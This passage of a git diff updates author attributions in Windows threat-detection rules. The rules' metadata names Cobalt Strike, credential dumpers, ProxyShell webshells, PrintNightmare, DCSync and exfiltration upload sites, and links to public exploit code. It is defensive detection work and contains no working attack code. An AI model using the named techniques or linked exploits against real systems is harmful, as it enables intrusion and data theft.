Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/11 modified: 2023/01/12 tags: diff --git a/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml b/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml index 5399760e3..30e93308f 100644 --- a/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml +++ b/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml @@ -7,7 +7,7 @@ references: - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/11 tags: - attack.defense_evasion diff --git a/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml b/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml index 591239dcc..3d3bbed2f 100644 --- a/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml +++ b/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml @@ -7,7 +7,7 @@ references: - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/11 modified: 2023/01/19 tags: diff --git a/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml b/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml index 73ee87ff0..19b333749 100644 --- a/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml +++ b/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml @@ -7,7 +7,7 @@ references: - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/11 tags: - attack.defense_evasion diff --git a/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml b/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml index 937a84dfa..dedc37ede 100644 --- a/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml +++ b/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml @@ -7,7 +7,7 @@ references: - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/11 tags: - attack.defense_evasion diff --git a/rules/windows/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml b/rules/windows/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml index 299085328..af67b2857 100644 --- a/rules/windows/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml +++ b/rules/windows/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml @@ -5,7 +5,7 @@ description: Detects execution of AppX packages with known suspicious or malicio references: - Internal Research - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/16 tags: - attack.defense_evasion diff --git a/rules/windows/builtin/bits_client/win_bits_client_direct_ip_access.yml b/rules/windows/builtin/bits_client/win_bits_client_direct_ip_access.yml index c333f1442..edb4dc744 100644 --- a/rules/windows/builtin/bits_client/win_bits_client_direct_ip_access.yml +++ b/rules/windows/builtin/bits_client/win_bits_client_direct_ip_access.yml @@ -10,7 +10,7 @@ references: - https://isc.sans.edu/diary/22264 - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/ - https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/11 tags: - attack.defense_evasion diff --git a/rules/windows/builtin/bits_client/win_bits_client_susp_domain.yml b/rules/windows/builtin/bits_client/win_bits_client_susp_domain.yml index 87d82d6aa..e4d29e91e 100644 --- a/rules/windows/builtin/bits_client/win_bits_client_susp_domain.yml +++ b/rules/windows/builtin/bits_client/win_bits_client_susp_domain.yml @@ -6,7 +6,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md - https://twitter.com/malmoeb/status/1535142803075960832 - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/06/28 modified: 2023/01/19 tags: diff --git a/rules/windows/builtin/bits_client/win_bits_client_susp_local_folder.yml b/rules/windows/builtin/bits_client/win_bits_client_susp_local_folder.yml index 413cfccab..1b1bd67f3 100644 --- a/rules/windows/builtin/bits_client/win_bits_client_susp_local_folder.yml +++ b/rules/windows/builtin/bits_client/win_bits_client_susp_local_folder.yml @@ -6,7 +6,7 @@ description: | Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/06/28 modified: 2023/01/10 tags: diff --git a/rules/windows/builtin/bits_client/win_bits_client_uncommon_domain.yml b/rules/windows/builtin/bits_client/win_bits_client_uncommon_domain.yml index 9d0b5e856..9eec03fa2 100644 --- a/rules/windows/builtin/bits_client/win_bits_client_uncommon_domain.yml +++ b/rules/windows/builtin/bits_client/win_bits_client_uncommon_domain.yml @@ -5,7 +5,7 @@ description: Detects a suspicious download using the BITS client from a FQDN tha references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md - https://twitter.com/malmoeb/status/1535142803075960832 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/06/10 modified: 2022/11/27 tags: diff --git a/rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml b/rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml index 7524598fa..192f2dd3d 100644 --- a/rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml +++ b/rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml @@ -1,7 +1,7 @@ title: Code Integrity Attempted DLL Load id: f8931561-97f5-4c46-907f-0a4a592e47a7 description: Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired -author: Florian Roth, Nasreddine Bencherchali +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali status: experimental references: - https://twitter.com/SBousseaden/status/1483810148602814466 diff --git a/rules/windows/builtin/code_integrity/win_codeintegrity_blocked_driver_load.yml b/rules/windows/builtin/code_integrity/win_codeintegrity_blocked_driver_load.yml index cd2a4ad9b..0712e124d 100644 --- a/rules/windows/builtin/code_integrity/win_codeintegrity_blocked_driver_load.yml +++ b/rules/windows/builtin/code_integrity/win_codeintegrity_blocked_driver_load.yml @@ -1,7 +1,7 @@ title: Code Integrity Blocked Driver Load id: e4be5675-4a53-426a-8c81-a8bb2387e947 description: Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) status: experimental references: - https://twitter.com/wdormann/status/1590434950335320065 diff --git a/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver.yml b/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver.yml index 5fb3d989d..5bbfa0152 100644 --- a/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver.yml +++ b/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver.yml @@ -1,7 +1,7 @@ title: Block Load Of Revoked Driver id: 9b72b82d-f1c5-4632-b589-187159bc6ec1 description: Detects blocked load attempts of revoked drivers -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) status: experimental references: - https://twitter.com/wdormann/status/1590434950335320065 diff --git a/rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml b/rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml index e2de8127e..a9a8fbe29 100644 --- a/rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml +++ b/rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml @@ -5,7 +5,7 @@ description: Detects loading of diagcab packages from a remote path, as seen in references: - https://twitter.com/nas_bench/status/1539679555908141061 - https://twitter.com/j00sean/status/1537750439701225472 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/14 tags: - attack.execution diff --git a/rules/windows/builtin/dns_client/win_dns_client__mal_cobaltstrike.yml b/rules/windows/builtin/dns_client/win_dns_client__mal_cobaltstrike.yml index be15f2373..0bd1e2212 100644 --- a/rules/windows/builtin/dns_client/win_dns_client__mal_cobaltstrike.yml +++ b/rules/windows/builtin/dns_client/win_dns_client__mal_cobaltstrike.yml @@ -8,7 +8,7 @@ description: Detects a program that invoked suspicious DNS queries known from Co references: - https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns - https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/16 tags: - attack.command_and_control diff --git a/rules/windows/builtin/dns_client/win_dns_client_anonymfiles_com.yml b/rules/windows/builtin/dns_client/win_dns_client_anonymfiles_com.yml index 467dbdcc0..c7e01fa2b 100644 --- a/rules/windows/builtin/dns_client/win_dns_client_anonymfiles_com.yml +++ b/rules/windows/builtin/dns_client/win_dns_client_anonymfiles_com.yml @@ -7,7 +7,7 @@ status: experimental description: Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes references: - https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/16 tags: - attack.exfiltration diff --git a/rules/windows/builtin/dns_client/win_dns_client_mega_nz.yml b/rules/windows/builtin/dns_client/win_dns_client_mega_nz.yml index e58b68a6b..3cd225570 100644 --- a/rules/windows/builtin/dns_client/win_dns_client_mega_nz.yml +++ b/rules/windows/builtin/dns_client/win_dns_client_mega_nz.yml @@ -7,7 +7,7 @@ status: test description: Detects DNS queries for subdomains used for upload to MEGA.io references: - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/16 tags: - attack.exfiltration diff --git a/rules/windows/builtin/dns_client/win_dns_client_tor_onion.yml b/rules/windows/builtin/dns_client/win_dns_client_tor_onion.yml index 38fcdae97..d1fd8d13a 100644 --- a/rules/windows/builtin/dns_client/win_dns_client_tor_onion.yml +++ b/rules/windows/builtin/dns_client/win_dns_client_tor_onion.yml @@ -7,7 +7,7 @@ status: test description: Detects DNS resolution of an .onion address related to Tor routing networks references: - https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/02/20 tags: - attack.command_and_control diff --git a/rules/windows/builtin/dns_client/win_dns_client_ufile_io.yml b/rules/windows/builtin/dns_client/win_dns_client_ufile_io.yml index 371f2ab3a..5c2d83e62 100644 --- a/rules/windows/builtin/dns_client/win_dns_client_ufile_io.yml +++ b/rules/windows/builtin/dns_client/win_dns_client_ufile_io.yml @@ -7,7 +7,7 @@ status: experimental description: Detects DNS queries to "ufile.io". Which is often abused by malware for upload and exfiltration references: - https://thedfirreport.com/2021/12/13/diavol-ransomware/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/16 tags: - attack.exfiltration diff --git a/rules/windows/builtin/dns_server/win_dns_server_susp_dns_config.yml b/rules/windows/builtin/dns_server/win_dns_server_susp_dns_config.yml index e7ebe7fcd..b3a5eb62e 100644 --- a/rules/windows/builtin/dns_server/win_dns_server_susp_dns_config.yml +++ b/rules/windows/builtin/dns_server/win_dns_server_susp_dns_config.yml @@ -6,7 +6,7 @@ references: - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 - https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx - https://twitter.com/gentilkiwi/status/861641945944391680 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/05/08 modified: 2021/11/27 tags: diff --git a/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml b/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml index fb40783bf..4fe4f122b 100644 --- a/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml +++ b/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml @@ -5,7 +5,7 @@ description: Detects plugged/unplugged USB devices references: - https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/ - https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/11/09 modified: 2021/11/30 tags: diff --git a/rules/windows/builtin/msexchange/win_exchange_cve_2021_42321.yml b/rules/windows/builtin/msexchange/win_exchange_cve_2021_42321.yml index a134f1d97..09b11ad9c 100644 --- a/rules/windows/builtin/msexchange/win_exchange_cve_2021_42321.yml +++ b/rules/windows/builtin/msexchange/win_exchange_cve_2021_42321.yml @@ -4,7 +4,7 @@ status: experimental description: Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321 references: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321 -author: 'Florian Roth, @testanull' +author: 'Florian Roth (Nextron Systems), @testanull' date: 2021/11/18 modified: 2022/07/12 tags: diff --git a/rules/windows/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml b/rules/windows/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml index 81f1c91be..dbe4af2d6 100644 --- a/rules/windows/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml +++ b/rules/windows/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml @@ -4,7 +4,7 @@ status: test description: Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory references: - https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/08/09 modified: 2023/01/23 tags: diff --git a/rules/windows/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml b/rules/windows/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml index 177a90402..2de17e7a1 100644 --- a/rules/windows/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml +++ b/rules/windows/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml @@ -4,7 +4,7 @@ status: test description: Detects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell references: - https://twitter.com/GossiTheDog/status/1429175908905127938 -author: Max Altgelt +author: Max Altgelt (Nextron Systems) date: 2021/08/23 modified: 2023/01/23 tags: diff --git a/rules/windows/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml b/rules/windows/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml index bdd232104..3bfc3b746 100644 --- a/rules/windows/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml +++ b/rules/windows/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml @@ -4,7 +4,7 @@ status: experimental description: Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it references: - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html -author: Florian Roth, Rich Warren, Christian Burkard +author: Florian Roth (Nextron Systems), Rich Warren, Christian Burkard (Nextron Systems) date: 2021/08/09 modified: 2022/10/26 tags: diff --git a/rules/windows/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml b/rules/windows/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml index 0b2e3b193..db7cb0a54 100644 --- a/rules/windows/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml +++ b/rules/windows/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml @@ -4,7 +4,7 @@ status: test description: Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit references: - https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/modules/exploits/windows/http/exchange_proxyshell_rce.rb#L430 -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/08/27 modified: 2023/01/23 tags: diff --git a/rules/windows/builtin/msexchange/win_exchange_transportagent.yml b/rules/windows/builtin/msexchange/win_exchange_transportagent.yml index d5ada08d4..049794fa0 100644 --- a/rules/windows/builtin/msexchange/win_exchange_transportagent.yml +++ b/rules/windows/builtin/msexchange/win_exchange_transportagent.yml @@ -7,7 +7,7 @@ status: test description: Detects the Installation of a Exchange Transport Agent references: - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=7 -author: Tobias Michalski +author: Tobias Michalski (Nextron Systems) date: 2021/06/08 modified: 2022/11/27 tags: diff --git a/rules/windows/builtin/msexchange/win_exchange_transportagent_failed.yml b/rules/windows/builtin/msexchange/win_exchange_transportagent_failed.yml index 3502696f4..0f85b3fb1 100644 --- a/rules/windows/builtin/msexchange/win_exchange_transportagent_failed.yml +++ b/rules/windows/builtin/msexchange/win_exchange_transportagent_failed.yml @@ -4,7 +4,7 @@ status: experimental description: Detects a failed installation of a Exchange Transport Agent references: - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=8 -author: Tobias Michalski +author: Tobias Michalski (Nextron Systems) date: 2021/06/08 modified: 2022/07/12 tags: diff --git a/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml b/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml index bb7b90e7f..cc1aea20b 100644 --- a/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml +++ b/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml @@ -5,7 +5,7 @@ description: Detects logons using NTLM, which could be caused by a legacy source references: - https://twitter.com/JohnLaTwC/status/1004895028995477505 - https://goo.gl/PsqrhT -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/06/08 modified: 2022/10/05 tags: diff --git a/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml b/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml index c3915cf3f..018dfe55c 100644 --- a/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml +++ b/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml @@ -6,7 +6,7 @@ references: - https://github.com/hhlxf/PrintNightmare - https://github.com/afwu/PrintNightmare - https://twitter.com/fuzzyf10w/status/1410202370835898371 -author: Florian Roth, KevTheHermit, fuzzyf10w, Tim Shelton +author: Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w, Tim Shelton date: 2021/06/30 modified: 2022/11/15 tags: diff --git a/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler_operational.yml b/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler_operational.yml index 5bfbe57e0..63e98252c 100644 --- a/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler_operational.yml +++ b/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler_operational.yml @@ -4,7 +4,7 @@ status: test description: Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 references: - https://twitter.com/MalwareJake/status/1410421967463731200 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/07/01 modified: 2022/10/09 tags: diff --git a/rules/windows/builtin/security/win_security_admin_share_access.yml b/rules/windows/builtin/security/win_security_admin_share_access.yml index 869c93fd1..be2c750a7 100644 --- a/rules/windows/builtin/security/win_security_admin_share_access.yml +++ b/rules/windows/builtin/security/win_security_admin_share_access.yml @@ -2,7 +2,7 @@ title: Access to ADMIN$ Share id: 098d7118-55bc-4912-a836-dc6483a8d150 status: test description: Detects access to $ADMIN share -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/03/04 modified: 2021/11/27 tags: diff --git a/rules/windows/builtin/security/win_security_alert_ruler.yml b/rules/windows/builtin/security/win_security_alert_ruler.yml index dd7f9f085..162633027 100644 --- a/rules/windows/builtin/security/win_security_alert_ruler.yml +++ b/rules/windows/builtin/security/win_security_alert_ruler.yml @@ -8,7 +8,7 @@ references: - https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427 - https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776 - https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/05/31 modified: 2022/10/09 tags: diff --git a/rules/windows/builtin/security/win_security_apt_chafer_mar18_security.yml b/rules/windows/builtin/security/win_security_apt_chafer_mar18_security.yml index 8c5607501..a70e7c25d 100644 --- a/rules/windows/builtin/security/win_security_apt_chafer_mar18_security.yml +++ b/rules/windows/builtin/security/win_security_apt_chafer_mar18_security.yml @@ -7,7 +7,7 @@ status: test description: Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018 references: - https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/ -author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community +author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community date: 2018/03/23 modified: 2022/11/27 tags: diff --git a/rules/windows/builtin/security/win_security_apt_slingshot.yml b/rules/windows/builtin/security/win_security_apt_slingshot.yml index 65a7a1f37..4c670c61c 100644 --- a/rules/windows/builtin/security/win_security_apt_slingshot.yml +++ b/rules/windows/builtin/security/win_security_apt_slingshot.yml @@ -7,7 +7,7 @@ status: test description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group references: - https://securelist.com/apt-slingshot/84312/ -author: Florian Roth, Bartlomiej Czyz (@bczyz1) +author: Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1) date: 2019/03/04 modified: 2022/11/27 tags: diff --git a/rules/windows/builtin/security/win_security_apt_wocao.yml b/rules/windows/builtin/security/win_security_apt_wocao.yml index 1be1ab5ad..866be30c5 100644 --- a/rules/windows/builtin/security/win_security_apt_wocao.yml +++ b/rules/windows/builtin/security/win_security_apt_wocao.yml @@ -5,7 +5,7 @@ description: Detects activity mentioned in Operation Wocao report references: - https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/ - https://twitter.com/SBousseaden/status/1207671369963646976 -author: Florian Roth, frack113 +author: Florian Roth (Nextron Systems), frack113 date: 2019/12/20 modified: 2022/11/27 tags: diff --git a/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml b/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml index 6a25f5188..51617ab1a 100644 --- a/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml +++ b/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml @@ -9,7 +9,7 @@ references: - https://www.sans.org/webcasts/119395 - https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/ - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ -author: Florian Roth, Wojciech Lesicki +author: Florian Roth (Nextron Systems), Wojciech Lesicki date: 2021/05/26 modified: 2022/11/27 tags: diff --git a/rules/windows/builtin/security/win_security_dcsync.yml b/rules/windows/builtin/security/win_security_dcsync.yml index 1663c2606..49e2ec4a5 100644 --- a/rules/windows/builtin/security/win_security_dcsync.yml +++ b/rules/windows/builtin/security/win_security_dcsync.yml @@ -7,7 +7,7 @@ references: - https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2 - https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r - https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662 -author: Benjamin Delpy, Florian Roth, Scott Dermott, Sorina Ionescu +author: Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu date: 2018/06/03 modified: 2022/04/26 tags: diff --git a/rules/windows/builtin/security/win_security_diagtrack_eop_default_login_username.yml b/rules/windows/builtin/security/win_security_diagtrack_eop_default_login_username.yml index e627c712e..69fad4a49 100644 --- a/rules/windows/builtin/security/win_security_diagtrack_eop_default_login_username.yml +++ b/rules/windows/builtin/security/win_security_diagtrack_eop_default_login_username.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the default "UserName" used by the DiagTrackEoP POC references: - https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L46 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/03 tags: - attack.privilege_escalation diff --git a/rules/windows/builtin/security/win_security_hidden_user_creation.yml b/rules/windows/builtin/security/win_security_hidden_user_creation.yml index d232a6fdc..588bc4cc8 100644 --- a/rules/windows/builtin/security/win_security_hidden_user_creation.yml +++ b/rules/windows/builtin/security/win_security_hidden_user_creation.yml @@ -4,7 +4,7 @@ status: test description: Detects the creation of a local hidden user account which should not happen for event ID 4720. references: - https://twitter.com/SBousseaden/status/1387743867663958021 -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/05/03 modified: 2022/10/09 tags: diff --git a/rules/windows/builtin/security/win_security_mal_creddumper.yml b/rules/windows/builtin/security/win_security_mal_creddumper.yml index f8146e092..262e53b24 100644 --- a/rules/windows/builtin/security/win_security_mal_creddumper.yml +++ b/rules/windows/builtin/security/win_security_mal_creddumper.yml @@ -7,7 +7,7 @@ status: test description: Detects well-known credential dumping tools execution via service execution events references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment -author: Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community +author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community date: 2017/03/05 modified: 2022/11/29 tags: diff --git a/rules/windows/builtin/security/win_security_mal_service_installs.yml b/rules/windows/builtin/security/win_security_mal_service_installs.yml index 603aa9928..4b24319fd 100644 --- a/rules/windows/builtin/security/win_security_mal_service_installs.yml +++ b/rules/windows/builtin/security/win_security_mal_service_installs.yml @@ -9,7 +9,7 @@ references: - https://awakesecurity.com/blog/threat-hunting-for-paexec/ - https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html - https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf -author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update) +author: Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update) date: 2017/03/27 modified: 2022/10/09 tags: diff --git a/rules/windows/builtin/security/win_security_net_ntlm_downgrade.yml b/rules/windows/builtin/security/win_security_net_ntlm_downgrade.yml index b69e5102e..47567df26 100644 --- a/rules/windows/builtin/security/win_security_net_ntlm_downgrade.yml +++ b/rules/windows/builtin/security/win_security_net_ntlm_downgrade.yml @@ -7,7 +7,7 @@ status: test description: Detects NetNTLM downgrade attack references: - https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks -author: Florian Roth, wagga +author: Florian Roth (Nextron Systems), wagga date: 2018/03/20 modified: 2022/10/09 tags: diff --git a/rules/windows/builtin/security/win_security_rare_schtasks_creations.yml b/rules/windows/builtin/security/win_security_rare_schtasks_creations.yml index 50bf5ce48..0b018e073 100644 --- a/rules/windows/builtin/security/win_security_rare_schtasks_creations.yml +++ b/rules/windows/builtin/security/win_security_rare_schtasks_creations.yml @@ -2,7 +2,7 @@ title: Rare Schtasks Creations id: b0d77106-7bb0-41fe-bd94-d1752164d066 status: test description: Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/03/23 modified: 2021/11/27 tags: diff --git a/rules/windows/builtin/security/win_security_rdp_bluekeep_poc_scanner.yml b/rules/windows/builtin/security/win_security_rdp_bluekeep_poc_scanner.yml index edd5503e0..9bb8fc0c5 100644 --- a/rules/windows/builtin/security/win_security_rdp_bluekeep_poc_scanner.yml +++ b/rules/windows/builtin/security/win_security_rdp_bluekeep_poc_scanner.yml 